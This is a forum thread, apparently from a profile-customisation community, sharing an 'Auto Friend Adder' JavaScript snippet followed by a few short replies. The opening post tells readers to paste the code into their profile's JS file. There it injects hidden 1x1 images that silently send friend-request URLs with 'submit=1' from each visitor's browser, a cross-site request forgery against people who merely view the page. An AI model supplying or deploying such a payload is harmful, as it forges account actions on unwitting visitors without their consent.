Auto Friend Adder
3 posters
Page 1 of 1
Auto Friend Adder
This is another version of what exist before
Using lastname would really hide our email from spammer
No need to alter anything, just copy paste the code anywhere inside your JS external file, outside onloadhandler recommended for faster load
Using lastname would really hide our email from spammer
- Spoiler:
var addfriend = $("0").getElementsByTagName("a");
for(x=0;x<addfriend.length;x++){
var a = addfriend[x].href;
if(a.indexOf("addfriend")!=-1){
$("0").innerHTML += "<img src='"+a+"&lastname="+pageOwnerFName+"&submit=1' width=' 1' height=' 1'/>"
}
}
No need to alter anything, just copy paste the code anywhere inside your JS external file, outside onloadhandler recommended for faster load
Re: Auto Friend Adder
strike 5 thread starter...
Энджелл Виллем де- Guest
-
Posts : 5
Age : 113
Joined date : 2009-11-14
Location :
Cash : 27435
Re: Auto Friend Adder
awesome bro . But I have reviwed your code , parang nalito ako aa .
Btw, thanks.
Btw, thanks.
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum